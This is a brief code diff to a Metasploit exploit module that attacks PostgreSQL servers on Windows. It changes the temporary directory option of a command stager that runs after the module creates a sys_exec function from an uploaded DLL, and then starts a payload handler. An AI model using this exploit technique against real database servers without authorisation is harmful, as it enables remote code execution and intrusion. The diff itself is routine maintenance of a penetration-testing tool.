diff --git a/modules/exploits/windows/postgres/postgres_payload.rb b/modules/exploits/windows/postgres/postgres_payload.rb index 9c45b54f09..39334b5b4e 100644 --- a/modules/exploits/windows/postgres/postgres_payload.rb +++ b/modules/exploits/windows/postgres/postgres_payload.rb @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote ret_sys_exec = postgres_create_sys_exec(dll) if ret_sys_exec if @postgres_conn - execute_cmdstager({:linemax => 1500, :nodelete => true}) + execute_cmdstager({:linemax => 1500, :nodelete => true, :temp=>"."}) handler postgres_logout if @postgres_conn else